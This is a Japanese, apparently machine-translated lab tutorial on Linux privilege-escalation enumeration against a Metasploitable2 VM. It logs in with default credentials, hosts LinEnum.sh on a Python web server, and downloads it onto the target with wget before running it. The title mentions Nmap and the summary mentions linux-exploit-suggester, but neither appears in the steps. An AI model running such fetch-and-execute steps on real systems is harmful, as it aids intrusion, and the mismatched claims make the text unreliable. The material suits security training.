Nmap で Linux の権限昇格ツールを探索する

Beginner

💡 このチュートリアルは英語版からAIによって翻訳されています。原文を確認するには、 ここをクリックしてください

はじめに

この実験では、最も一般的に使用される 2 つの Linux 特権昇格自動化ツール - LinEnum と linux-exploit-suggester を探索します。目的は、ペネトレーションテストやセキュリティ評価中に、これらのツールを効果的に活用して特権昇格プロセスを迅速化する方法を学ぶことです。これらのツールを習得することで、大幅に時間と労力を節約でき、特権昇格の基本原理や方法論の理解に集中することができます。


Skills Graph

環境のセットアップ

このステップでは、ターゲットシステムとして使用する Metasploitable2 仮想マシンをセットアップします。以下の手順に従って、仮想マシンを起動し、接続を確立します。

私たちの実験環境では、Metasploitable2 仮想マシンの設定はすでに「事前設定」されています。以下の手順を使用して、仮想マシンを起動し、接続することができます。

  1. ターミナルを開き、以下のコマンドを実行して Metasploitable2 仮想マシンを起動します。

    sudo virsh start Metasploitable2
  2. 仮想マシンが完全に起動して使用可能になるまで、1 - 2 分待ちます。

  3. ホストマシンから Metasploitable2 の IP アドレス (192.168.122.102) を ping できることを確認します。

  4. 以下のコマンドを使用して、SSH を介して Metasploitable2 仮想マシンに接続します。

    ssh msfadmin@192.168.122.102

    初回接続時には、ホストの信頼性を確認するメッセージが表示されます。yes と入力し、Enter キーを押して続行します。

    その後、パスワードの入力を求められたら、msfadmin のパスワードを入力します。

    msfadmin

認証に成功すると、Metasploitable2 仮想マシン上で低特権のシェルセッションを持つことができます。

LinEnum: Linux システムの列挙を自動化する

LinEnum は、Linux システム上の列挙プロセスを自動化する強力なスクリプトです。特権昇格プロセスに役立つ貴重な情報を収集します。以下の手順に従って、Metasploitable2 仮想マシン上で LinEnum を使用します。

  1. ホストマシンでターミナルを開き、/tmp ディレクトリに移動します。

    cd /tmp

    プロジェクトの /tmp ディレクトリには LinEnum.sh というスクリプトがあります。

  2. /tmp ディレクトリで Python HTTP サーバーを起動し、LinEnum スクリプトをホストします。

    python3 -m http.server 8000
  3. Metasploitable2 VM 上で、/tmp ディレクトリに移動し、ホストマシン上で実行されている Python HTTP サーバーから wget を使用して LinEnum スクリプトをダウンロードします。

    /tmp ディレクトリに移動します。

    cd /tmp
    wget 192.168.122.1:8000/LinEnum.sh -P /tmp
  4. LinEnum スクリプトを実行可能にします。

    chmod +x LinEnum.sh
  5. LinEnum スクリプトを実行し、出力をさらなる分析のためにファイルにリダイレクトします。

    LinEnum.sh > linenum_output.txt

LinEnum は様々なチェックを実行し、システム情報を列挙します。潜在的な脆弱性や設定ミスを黄色のテキストで強調表示します。これらの強調表示された部分には特に注意を払ってください。これらには特権昇格の機会が隠されている可能性があります。

まとめ

この実験では、Linux システム上の特権昇格プロセスを支援するために、2 つの強力な自動化ツールである LinEnum と linux-exploit-suggester の使用方法を学びました。LinEnum はシステム情報を包括的に列挙し、潜在的な脆弱性や設定ミスを強調表示します。linux-exploit-suggester ツールはカーネルバージョンを分析し、特権昇格につながる関連するカーネルエクスプロイトを提案します。

これらのツールを活用することで、情報収集と分析のフェーズを合理化し、ペネトレーションテストやセキュリティ評価中に貴重な時間を節約することができます。ただし、これらのツールはプロセスを支援するためのものであり、成功したエクスプロイトには特権昇格の技術と方法論に対するしっかりとした理解が依然として不可欠であることを理解することが重要です。

この実験を通じて、脆弱な仮想マシン環境のセットアップ、LinEnum と linux-exploit-suggester スクリプトのダウンロードと実行、およびそれらの出力の解釈を練習しました。この実験から得られた実践的な経験は、効率的かつ効果的な特権昇格が倫理的ハッカーやセキュリティ専門家にとって重要なスキルである実際のシナリオで非常に貴重なものとなります。